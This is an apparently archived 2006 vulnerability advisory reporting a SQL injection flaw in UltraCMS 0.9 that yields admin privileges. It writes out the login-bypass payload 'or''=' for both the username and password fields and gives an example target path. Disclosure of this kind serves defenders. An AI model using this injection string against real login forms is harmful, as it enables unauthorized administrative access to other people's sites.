UltraCMS 0.9 sql injection

2006-10-21T00:00:00
ID SECURITYVULNS:DOC:14758
Type securityvulns
Reporter Securityvulns
Modified 2006-10-21T00:00:00

Description


  • Tunis the 18 October 2006*
  • bug found by fireboy *

product:UltraCMS 0.9

there is an sql injection problem in UltraCMS 0.9 and it can be exploited to gain admin privileges.

exploit: user: 'or''=' pass: 'or''='

example : http://www.target.com/include/index.php

thx